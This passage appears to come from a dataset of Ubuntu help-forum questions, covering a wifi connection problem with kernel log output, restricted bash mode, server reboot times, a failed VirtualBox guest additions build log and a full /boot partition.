1700 mbm ) [ 1245.473453 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1245.473454 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1245.473456 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1245.473458 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1245.473460 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1269.634002 ] usb 1-6 : usb disconnect , device number 7 [ 1269.636075 ] rndis_host 1-6:1.0 usb0 : unregister 'rndis_host ' usb-0000:00:02.1-6 , rndis device [ 1290.554058 ] wlan0 : deauthenticating from c4:39:3a:15:63:88 by local choice ( reason=3 ) [ 1290.571246 ] cfg80211 : calling crda to update world regulatory domain [ 1290.578585 ] cfg80211 : world regulatory domain updated : [ 1290.578594 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1290.578598 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1290.578600 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1290.578602 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1290.578604 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1290.578605 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1307.924514 ] wlan0 : authenticate with 06:1d : d5 : ff:10:20 [ 1307.956604 ] wlan0 : direct probe to 06:1d : d5 : ff:10:20 ( try 1/3 ) [ 1308.159420 ] wlan0 : direct probe to 06:1d : d5 : ff:10:20 ( try 2/3 ) [ 1308.363357 ] wlan0 : direct probe to 06:1d : d5 : ff:10:20 ( try 3/3 ) [ 1308.567359 ] wlan0 : authentication with 06:1d : d5 : ff:10:20 timed out [ 1322.290815 ] usb 1-6 : new high-speed usb device number 8 using ehci-pci [ 1322.424250 ] usb 1-6 : new usb device found , idvendor=04e8 , idproduct=6865 [ 1322.424262 ] usb 1-6 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 1322.424268 ] usb 1-6 : product : samsung_android_sph-l710 [ 1322.424273 ] usb 1-6 : manufacturer : samsung [ 1322.424277 ] usb 1-6 : serialnumber : 7a82037e [ 1396.352275 ] wlan0 : authenticate with 34:23 : ba:35:8f:7a [ 1396.377484 ] wlan0 : send auth to 34:23 : ba:35:8f:7a ( try 1/3 ) [ 1396.381444 ] wlan0 : authenticated [ 1396.383326 ] wlan0 : associate with 34:23 : ba:35:8f:7a ( try 1/3 ) [ 1396.403089 ] wlan0 : rx assocresp from 34:23 : ba:35:8f:7a ( capab=0x401 status=0 aid=1 ) [ 1396.403175 ] wlan0 : associated [ 1428.620766 ] wlan0 : deauthenticating from 34:23 : ba:35:8f:7a by local choice ( reason=3 ) [ 1428.635944 ] cfg80211 : calling crda to update world regulatory domain [ 1428.642438 ] cfg80211 : world regulatory domain updated : [ 1428.642446 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1428.642448 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1428.642451 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1428.642453 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1428.642455 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1428.642456 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1430.471960 ] wlan0 : authenticate with c4:39:3a:15:63:88 [ 1430.485934 ] wlan0 : send auth to c4:39:3a:15:63:88 ( try 1/3 ) [ 1430.492432 ] wlan0 : authenticated [ 1430.495391 ] wlan0 : associate with c4:39:3a:15:63:88 ( try 1/3 ) [ 1430.502970 ] wlan0 : rx assocresp from c4:39:3a:15:63:88 ( capab=0xc01 status=0 aid=1 ) [ 1430.503089 ] wlan0 : associated [ 1430.503423 ] cfg80211 : calling crda for country : us [ 1430.511712 ] cfg80211 : regulatory domain changed to country : us [ 1430.511727 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1430.511734 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1430.511738 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1430.511742 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1430.511746 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1430.511749 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1430.511753 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1430.511757 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1476.441679 ] wlan0 : deauthenticating from c4:39:3a:15:63:88 by local choice ( reason=3 ) [ 1476.455673 ] cfg80211 : calling crda to update world regulatory domain [ 1476.465744 ] cfg80211 : world regulatory domain updated : [ 1476.465756 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1476.465761 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1476.465766 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1476.465770 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1476.465774 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1476.465777 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1496.175855 ] usb 1-6 : usb disconnect , device number 8 [ 1496.476442 ] usb 1-6 : new high-speed usb device number 9 using ehci-pci [ 1496.609947 ] usb 1-6 : new usb device found , idvendor=04e8 , idproduct=6863 [ 1496.609959 ] usb 1-6 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 1496.609965 ] usb 1-6 : product : samsung_android_sph-l710 [ 1496.609970 ] usb 1-6 : manufacturer : samsung [ 1496.609974 ] usb 1-6 : serialnumber : 7a82037e [ 1496.612834 ] rndis_host 1-6:1.0 usb0 : register 'rndis_host ' at usb-0000:00:02.1-6 , rndis device , 02:04:56:5d:32:30 [ 1748.812978 ] usb 1-5 : usb disconnect , device number 3 [ 1748.837498 ] rtl_usb : reg 0x102 , usbctrl_vendorreq timeout ! status:0xffffffed value=0x0 [ 1748.837516 ] rtl_usb : reg 0x422 , usbctrl_vendorreq timeout ! status:0xffffffed value=0x20004 [ 1748.837527 ] rtl_usb : reg 0x542 , usbctrl_vendorreq timeout ! status:0xffffffed value=0x20000 [ 1748.837538 ] rtl_usb : reg 0x608 , usbctrl_vendorreq timeout ! status:0xffffffed value=0x83040000 [ 2996.422443 ] usb 1-5 : new high-speed usb device number 10 using ehci-pci [ 2996.556116 ] usb 1-5 : new usb device found , idvendor=0846 , idproduct=9041 [ 2996.556123 ] usb 1-5 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 2996.556129 ] usb 1-5 : product : 802.11n wlan adapter [ 2996.556133 ] usb 1-5 : manufacturer : realtek [ 2996.556137 ] usb 1-5 : serialnumber : 00e04c000001 [ 2996.556984 ] rtl8192cu : chip version 0x10 [ 2996.665773 ] rtl8192cu : mac address : e0:46:9a:32:60:12 [ 2996.665779 ] rtl8192cu : board type 0 [ 2996.666017 ] rtl_usb : rx_max_size 15360 , rx_urb_num 8 , in_ep 1 [ 2996.666097 ] rtl8192cu : loading firmware rtlwifi/rtl8192cufw.bin [ 2996.666570 ] ieee80211 phy1 : selected rate control algorithm 'rtl_rc' [ 2996.667782 ] rtlwifi : wireless switch is on [ 2996.723342 ] rtl8192cu : mac auto on okay ! [ 2996.776310 ] rtl8192cu : tx queue select : 0x05 [ 2997.151971 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 2997.152724 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 3028.736827 ] wlan0 : authenticate with c4:39:3a:15:63:88 [ 3028.762330 ] wlan0 : send auth to c4:39:3a:15:63:88 ( try 1/3 ) [ 3028.765942 ] wlan0 : authenticated [ 3028.768172 ] wlan0 : associate with c4:39:3a:15:63:88 ( try 1/3 ) [ 3028.793369 ] wlan0 : rx assocresp from c4:39:3a:15:63:88 ( capab=0xc01 status=0 aid=1 ) [ 3028.793444 ] wlan0 : associated [ 3028.793639 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 3028.795107 ] cfg80211 : calling crda for country : us [ 3028.805585 ] cfg80211 : regulatory domain changed to country : us [ 3028.805598 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 3028.805603 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 3028.805608 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 3028.805612 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3028.805615 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3028.805618 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 3028.805622 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 3028.805625 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) iwconfig output : alan @ alan-ubuntu : ~ $ iwconfig usb0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off removed the password still the same issue . sorry for all this weird formatting , i barely registered today and do n't really know how to use these formating options .
442566	how to turn off restricted bash mode ?	i accidentally turned on restricted bash mode . with bash -r command . now i can not cd . how to turn off bash restricted mode and get back to normal bash ?
442575	how to check when the server was rebootet ? ubuntu 12.04 server	guys i need to know if my server was rebootet . i only see my last login when i login . where is this info stored ?
442580	vmlite guest addition error	i tried to install the guest addition of vmlite based on virtual box on a x86 ubuntu 12.04.4 . i used a guest addition iso image for virtualbox 3.2.6 . of course i am just a windows user and do n't know anything about ubuntu or linux . i also tried to kind of update the linux headers . it did not worked too . does anybody know what i must do to get the guest addition installed ? some phrases are in german : datei oder verzeichnis nicht gefunden - file or directory not found schwerwiegender fehler - hard error fehler - mistake or error excuse me , i ca n't understand how to get a spoiler . here is the error log : grep : /lib/modules/3.11.0-19-generic/build/include/linux/version.h : datei oder verzeichnis nicht gefunden make kbuild_verbose=1 -c /lib/modules/3.11.0-19-generic/build subdirs=/tmp/vbox.0 srcroot=/tmp/vbox.0 modules test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \ echo > & 2 ; \ echo > & 2 `` error : kernel configuration is invalid . `` ; \ echo > & 2 `` include/generated/autoconf.h or include/config/auto.conf are missing . `` ; \ echo > & 2 `` run 'make oldconfig & & make prepare ' on kernel src to fix it . `` ; \ echo > & 2 ; \ /bin/false ) mkdir -p /tmp/vbox.0/.tmp_versions ; rm -f /tmp/vbox.0/.tmp_versions/* make -f scripts/makefile.build obj=/tmp/vbox.0 grep : /lib/modules/3.11.0-19-generic/build/include/linux/version.h : datei oder verzeichnis nicht gefunden gcc -wp , -md , /tmp/vbox.0/.test.o.d -nostdinc -isystem /usr/lib/gcc/i686-linux-gnu/4.6/include -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include -iarch/x86/include/generated -iinclude -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include/uapi -iarch/x86/include/generated/uapi -i/usr/src/linux-headers-3.11.0-19-generic/include/uapi -iinclude/generated/uapi -include /usr/src/linux-headers-3.11.0-19-generic/include/linux/kconfig.h -iubuntu/include -d__kernel__ -wall -wundef -wstrict-prototypes -wno-trigraphs -fno-strict-aliasing -fno-common -werror-implicit-function-declaration -wno-format-security -fno-delete-null-pointer-checks -o2 -m32 -msoft-float -mregparm=3 -freg-struct-return -mno-mmx -mno-sse -fno-pic -mpreferred-stack-boundary=2 -march=i686 -mtune=generic -maccumulate-outgoing-args -wa , -mtune=generic32 -ffreestanding -fstack-protector -dconfig_as_cfi=1 -dconfig_as_cfi_signal_frame=1 -dconfig_as_cfi_sections=1 -dconfig_as_avx=1 -dconfig_as_avx2=1 -pipe -wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -wframe-larger-than=1024 -wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -pg -wdeclaration-after-statement -wno-pointer-sign -fno-strict-overflow -fconserve-stack -dcc_have_asm_goto -i/lib/modules/3.11.0-19-generic/build/include -i/tmp/vbox.0/ -i/tmp/vbox.0/include -i/tmp/vbox.0/r0drv/linux -d__kernel__ -dmodule -drt_os_linux -din_ring0 -d_x86_ -din_rt_r0 -din_sup_r0 -dvbgl_vboxguest -dvbgl_hgcm -dvbox_with_hgcm -dmodule -d '' kbuild_str ( s ) = # s '' -d '' kbuild_basename=kbuild_str ( test ) '' -d '' kbuild_modname=kbuild_str ( vboxadd_test ) '' -c -o /tmp/vbox.0/.tmp_test.o /tmp/vbox.0/test.c if [ `` -pg '' = `` -pg '' ] ; then if [ /tmp/vbox.0/test.o ! = `` scripts/mod/empty.o '' ] ; then /usr/src/linux-headers-3.11.0-19-generic/scripts/recordmcount `` /tmp/vbox.0/test.o '' ; fi ; fi ; ld -m elf_i386 -r -o /tmp/vbox.0/vboxadd_test.o /tmp/vbox.0/test.o ( cat /dev/null ; echo kernel//tmp/vbox.0/vboxadd_test.ko ; ) > /tmp/vbox.0/modules.order make -f /usr/src/linux-headers-3.11.0-19-generic/scripts/makefile.modpost grep : /lib/modules/3.11.0-19-generic/build/include/linux/version.h : datei oder verzeichnis nicht gefunden find /tmp/vbox.0/.tmp_versions -name '*.mod ' | xargs -r grep -h '\.ko $ ' | sort -u | sed 's/\.ko $ /.o/ ' | scripts/mod/modpost -m -a -i /usr/src/linux-headers-3.11.0-19-generic/module.symvers -i /tmp/vbox.0/module.symvers -o /tmp/vbox.0/module.symvers -s -w -s -t - gcc -wp , -md , /tmp/vbox.0/.vboxadd_test.mod.o.d -nostdinc -isystem /usr/lib/gcc/i686-linux-gnu/4.6/include -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include -iarch/x86/include/generated -iinclude -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include/uapi -iarch/x86/include/generated/uapi -i/usr/src/linux-headers-3.11.0-19-generic/include/uapi -iinclude/generated/uapi -include /usr/src/linux-headers-3.11.0-19-generic/include/linux/kconfig.h -iubuntu/include -d__kernel__ -wall -wundef -wstrict-prototypes -wno-trigraphs -fno-strict-aliasing -fno-common -werror-implicit-function-declaration -wno-format-security -fno-delete-null-pointer-checks -o2 -m32 -msoft-float -mregparm=3 -freg-struct-return -mno-mmx -mno-sse -fno-pic -mpreferred-stack-boundary=2 -march=i686 -mtune=generic -maccumulate-outgoing-args -wa , -mtune=generic32 -ffreestanding -fstack-protector -dconfig_as_cfi=1 -dconfig_as_cfi_signal_frame=1 -dconfig_as_cfi_sections=1 -dconfig_as_avx=1 -dconfig_as_avx2=1 -pipe -wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -wframe-larger-than=1024 -wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -pg -wdeclaration-after-statement -wno-pointer-sign -fno-strict-overflow -fconserve-stack -dcc_have_asm_goto -i/lib/modules/3.11.0-19-generic/build/include -i/tmp/vbox.0/ -i/tmp/vbox.0/include -i/tmp/vbox.0/r0drv/linux -d__kernel__ -dmodule -drt_os_linux -din_ring0 -d_x86_ -din_rt_r0 -din_sup_r0 -dvbgl_vboxguest -dvbgl_hgcm -dvbox_with_hgcm -d '' kbuild_str ( s ) = # s '' -d '' kbuild_basename=kbuild_str ( vboxadd_test.mod ) '' -d '' kbuild_modname=kbuild_str ( vboxadd_test ) '' -dmodule -c -o /tmp/vbox.0/vboxadd_test.mod.o /tmp/vbox.0/vboxadd_test.mod.c ld -r -m elf_i386 -t /usr/src/linux-headers-3.11.0-19-generic/scripts/module-common.lds -- build-id -o /tmp/vbox.0/vboxadd_test.ko /tmp/vbox.0/vboxadd_test.o /tmp/vbox.0/vboxadd_test.mod.o /tmp/vbox.0/makefile.include.header:87 : ignoring unknown build_type value '_buildtype_ ' . grep : /lib/modules/3.11.0-19-generic/build/include/linux/version.h : datei oder verzeichnis nicht gefunden make kbuild_verbose=1 -c /lib/modules/3.11.0-19-generic/build subdirs=/tmp/vbox.0 srcroot=/tmp/vbox.0 modules test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \ echo > & 2 ; \ echo > & 2 `` error : kernel configuration is invalid . `` ; \ echo > & 2 `` include/generated/autoconf.h or include/config/auto.conf are missing . `` ; \ echo > & 2 `` run 'make oldconfig & & make prepare ' on kernel src to fix it . `` ; \ echo > & 2 ; \ /bin/false ) mkdir -p /tmp/vbox.0/.tmp_versions ; rm -f /tmp/vbox.0/.tmp_versions/* make -f scripts/makefile.build obj=/tmp/vbox.0 /tmp/vbox.0/makefile.include.header:93 : using build_type='release ' from the environment . gcc -wp , -md , /tmp/vbox.0/.test_drm.o.d -nostdinc -isystem /usr/lib/gcc/i686-linux-gnu/4.6/include -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include -iarch/x86/include/generated -iinclude -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include/uapi -iarch/x86/include/generated/uapi -i/usr/src/linux-headers-3.11.0-19-generic/include/uapi -iinclude/generated/uapi -include /usr/src/linux-headers-3.11.0-19-generic/include/linux/kconfig.h -iubuntu/include -d__kernel__ -wall -wundef -wstrict-prototypes -wno-trigraphs -fno-strict-aliasing -fno-common -werror-implicit-function-declaration -wno-format-security -fno-delete-null-pointer-checks -o2 -m32 -msoft-float -mregparm=3 -freg-struct-return -mno-mmx -mno-sse -fno-pic -mpreferred-stack-boundary=2 -march=i686 -mtune=generic -maccumulate-outgoing-args -wa , -mtune=generic32 -ffreestanding -fstack-protector -dconfig_as_cfi=1 -dconfig_as_cfi_signal_frame=1 -dconfig_as_cfi_sections=1 -dconfig_as_avx=1 -dconfig_as_avx2=1 -pipe -wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -wframe-larger-than=1024 -wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -pg -wdeclaration-after-statement -wno-pointer-sign -fno-strict-overflow -fconserve-stack -dcc_have_asm_goto -i/lib/modules/3.11.0-19-generic/build/include -i/tmp/vbox.0/ -i/tmp/vbox.0/include -i/tmp/vbox.0/r0drv/linux -d__kernel__ -dmodule -drt_os_linux -din_ring0 -din_rt_r0 -din_sup_r0 -dvbox -dvbgl_vboxguest -dvbox_with_hgcm -dlog_to_backdoor -drt_with_vbox -din_module -din_guest_r0 -drt_arch_x86 -dmodule -d '' kbuild_str ( s ) = # s '' -d '' kbuild_basename=kbuild_str ( test_drm ) '' -d '' kbuild_modname=kbuild_str ( vboxadd_test_drm ) '' -c -o /tmp/vbox.0/.tmp_test_drm.o /tmp/vbox.0/test_drm.c if [ `` -pg '' = `` -pg '' ] ; then if [ /tmp/vbox.0/test_drm.o ! = `` scripts/mod/empty.o '' ] ; then /usr/src/linux-headers-3.11.0-19-generic/scripts/recordmcount `` /tmp/vbox.0/test_drm.o '' ; fi ; fi ; ld -m elf_i386 -r -o /tmp/vbox.0/vboxadd_test_drm.o /tmp/vbox.0/test_drm.o ( cat /dev/null ; echo kernel//tmp/vbox.0/vboxadd_test_drm.ko ; ) > /tmp/vbox.0/modules.order make -f /usr/src/linux-headers-3.11.0-19-generic/scripts/makefile.modpost /tmp/vbox.0/makefile.include.header:93 : using build_type='release ' from the environment . find /tmp/vbox.0/.tmp_versions -name '*.mod ' | xargs -r grep -h '\.ko $ ' | sort -u | sed 's/\.ko $ /.o/ ' | scripts/mod/modpost -m -a -i /usr/src/linux-headers-3.11.0-19-generic/module.symvers -i /tmp/vbox.0/module.symvers -o /tmp/vbox.0/module.symvers -s -w -s -t - gcc -wp , -md , /tmp/vbox.0/.vboxadd_test_drm.mod.o.d -nostdinc -isystem /usr/lib/gcc/i686-linux-gnu/4.6/include -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include -iarch/x86/include/generated -iinclude -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include/uapi -iarch/x86/include/generated/uapi -i/usr/src/linux-headers-3.11.0-19-generic/include/uapi -iinclude/generated/uapi -include /usr/src/linux-headers-3.11.0-19-generic/include/linux/kconfig.h -iubuntu/include -d__kernel__ -wall -wundef -wstrict-prototypes -wno-trigraphs -fno-strict-aliasing -fno-common -werror-implicit-function-declaration -wno-format-security -fno-delete-null-pointer-checks -o2 -m32 -msoft-float -mregparm=3 -freg-struct-return -mno-mmx -mno-sse -fno-pic -mpreferred-stack-boundary=2 -march=i686 -mtune=generic -maccumulate-outgoing-args -wa , -mtune=generic32 -ffreestanding -fstack-protector -dconfig_as_cfi=1 -dconfig_as_cfi_signal_frame=1 -dconfig_as_cfi_sections=1 -dconfig_as_avx=1 -dconfig_as_avx2=1 -pipe -wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -wframe-larger-than=1024 -wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -pg -wdeclaration-after-statement -wno-pointer-sign -fno-strict-overflow -fconserve-stack -dcc_have_asm_goto -i/lib/modules/3.11.0-19-generic/build/include -i/tmp/vbox.0/ -i/tmp/vbox.0/include -i/tmp/vbox.0/r0drv/linux -d__kernel__ -dmodule -drt_os_linux -din_ring0 -din_rt_r0 -din_sup_r0 -dvbox -dvbgl_vboxguest -dvbox_with_hgcm -dlog_to_backdoor -drt_with_vbox -din_module -din_guest_r0 -drt_arch_x86 -d '' kbuild_str ( s ) = # s '' -d '' kbuild_basename=kbuild_str ( vboxadd_test_drm.mod ) '' -d '' kbuild_modname=kbuild_str ( vboxadd_test_drm ) '' -dmodule -c -o /tmp/vbox.0/vboxadd_test_drm.mod.o /tmp/vbox.0/vboxadd_test_drm.mod.c ld -r -m elf_i386 -t /usr/src/linux-headers-3.11.0-19-generic/scripts/module-common.lds -- build-id -o /tmp/vbox.0/vboxadd_test_drm.ko /tmp/vbox.0/vboxadd_test_drm.o /tmp/vbox.0/vboxadd_test_drm.mod.o attempting to install using dkms creating symlink /var/lib/dkms/vboxguest/3.2.6/source - > /usr/src/vboxguest-3.2.6 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . make kernelrelease=3.11.0-19-generic -c /lib/modules/3.11.0-19-generic/build m=/var/lib/dkms/vboxguest/3.2.6/build ... . ( bad exit status : 2 ) error ( dkms apport ) : binary package for vboxguest : 3.2.6 not found error ! bad return status for module build on kernel : 3.11.0-19-generic ( i686 ) consult /var/lib/dkms/vboxguest/3.2.6/build/make.log for more information . failed to install using dkms , attempting to install without grep : /lib/modules/3.11.0-19-generic/build/include/linux/version.h : datei oder verzeichnis nicht gefunden make kbuild_verbose=1 -c /lib/modules/3.11.0-19-generic/build subdirs=/tmp/vbox.0 srcroot=/tmp/vbox.0 modules test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \ echo > & 2 ; \ echo > & 2 `` error : kernel configuration is invalid . `` ; \ echo > & 2 `` include/generated/autoconf.h or include/config/auto.conf are missing . `` ; \ echo > & 2 `` run 'make oldconfig & & make prepare ' on kernel src to fix it . `` ; \ echo > & 2 ; \ /bin/false ) mkdir -p /tmp/vbox.0/.tmp_versions ; rm -f /tmp/vbox.0/.tmp_versions/* make -f scripts/makefile.build obj=/tmp/vbox.0 gcc -wp , -md , /tmp/vbox.0/.vboxguest-linux.o.d -nostdinc -isystem /usr/lib/gcc/i686-linux-gnu/4.6/include -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include -iarch/x86/include/generated -iinclude -i/usr/src/linux-headers-3.11.0-19-generic/arch/x86/include/uapi -iarch/x86/include/generated/uapi -i/usr/src/linux-headers-3.11.0-19-generic/include/uapi -iinclude/generated/uapi -include /usr/src/linux-headers-3.11.0-19-generic/include/linux/kconfig.h -iubuntu/include -d__kernel__ -wall -wundef -wstrict-prototypes -wno-trigraphs -fno-strict-aliasing -fno-common -werror-implicit-function-declaration -wno-format-security -fno-delete-null-pointer-checks -o2 -m32 -msoft-float -mregparm=3 -freg-struct-return -mno-mmx -mno-sse -fno-pic -mpreferred-stack-boundary=2 -march=i686 -mtune=generic -maccumulate-outgoing-args -wa , -mtune=generic32 -ffreestanding -fstack-protector -dconfig_as_cfi=1 -dconfig_as_cfi_signal_frame=1 -dconfig_as_cfi_sections=1 -dconfig_as_avx=1 -dconfig_as_avx2=1 -pipe -wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -wframe-larger-than=1024 -wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -pg -wdeclaration-after-statement -wno-pointer-sign -fno-strict-overflow -fconserve-stack -dcc_have_asm_goto -i/lib/modules/3.11.0-19-generic/build/include -i/tmp/vbox.0/ -i/tmp/vbox.0/include -i/tmp/vbox.0/r0drv/linux -d__kernel__ -dmodule -dvbox -drt_os_linux -din_ring0 -din_rt_r0 -din_guest -din_guest_r0 -din_module -drt_with_vbox -dvbgl_vboxguest -dvbox_with_hgcm -drt_arch_x86 -dmodule -d '' kbuild_str ( s ) = # s '' -d '' kbuild_basename=kbuild_str ( vboxguest_linux ) '' -d '' kbuild_modname=kbuild_str ( vboxguest ) '' -c -o /tmp/vbox.0/.tmp_vboxguest-linux.o /tmp/vbox.0/vboxguest-linux.c in file included from /tmp/vbox.0/r0drv/linux/the-linux-kernel.h:34:0 , from /tmp/vbox.0/vboxguest-linux.c:27 : /tmp/vbox.0/include/iprt/types.h:97:31 : schwerwiegender fehler : linux/autoconf.h : datei oder verzeichnis nicht gefunden kompilierung beendet . make [ 2 ] : *** [ /tmp/vbox.0/vboxguest-linux.o ] fehler 1 make [ 1 ] : *** [ _module_/tmp/vbox.0 ] fehler 2 make : *** [ vboxguest ] fehler 2
442582	no unused kernels in /boot but still 100 % full	my /boot partition is `` full '' but actually only the used kernel is inside . i found similar questions and i followed the instructions for unused kernels removal . i am using 3.2.0-58-generic-pae and i 've cleared all the rest with sudo rm -rf /boot/*-3.2.0- { 29,32,33,34,35,36,37,38,39,40,41,44,45,48,49,52,53,56,57 } -* i also performed apt-get clean , apt-get remove , apt-get autoremove but nothing changed . the /boot is still showing 100 % full although there is only 1 kernel inside . any ideas ? the outputs of : ls /boot ; df -h ; df -i : ls /boot/ abi-3.2.0-58-generic-pae lost+found config-3.2.0-58-generic-pae memtest86+.bin extlinux memtest86+_multiboot.bin grub system.map-3.2.0-58-generic-pae initrd.img-3.2.0-58-generic-pae vmlinuz-3.2.0-58-generic-pae df -h filesystem size used avail use % mounted on /dev/sda12 9.7g 379m 8.9g 5 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 797m 1.2m 796m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 192k 2.0g 1 % /run/shm /dev/sda11 14g 163m 13g 2 % /tmp /dev/sda1 461m 445m 0 100 % /boot /dev/sda6 56g 39g 15g 73 % /home /dev/sda9 19g 172m 18g 1 % /opt /dev/sda7 19g 4.4g 14g 26 % /usr /dev/sda8 19g 176m 18g 1 % /usr/local /dev/sda10 9.2g 922m 7.9g 11 % /var df -i filesystem inodes iused ifree iuse % mounted on /dev/sda12 644640 9557 635083 2 % / udev 208092 587 207505 1 % /dev tmpfs 211750 542 211208 1 % /run none 211750 3 211747 1 % /run/lock none 211750 9 211741 1 % /run/shm /dev/sda11 915712 38 915674 1 % /tmp /dev/sda1 121920 457 121463 1 % /boot /dev/sda6 3662848 40036 3622812 2 % /home /dev/sda9 1220608 11 1220597 1 % /opt /dev/sda7 1220608 511759 708849 42 % /usr /dev/sda8 1220608 113 1220495 1 % /usr/local /dev/sda10 610800 9269 601531 2 % /var ls -l /boot total 22369 -rw-r -- r -- 1 root root 804938 dec 3 20:02 abi-3.2.0-58-generic-pae -rw-r -- r -- 1 root root 147576 dec 3 20:02 config-3.2.0-58-generic-pae drwxr-xr-x 3 root root 1024 feb 12 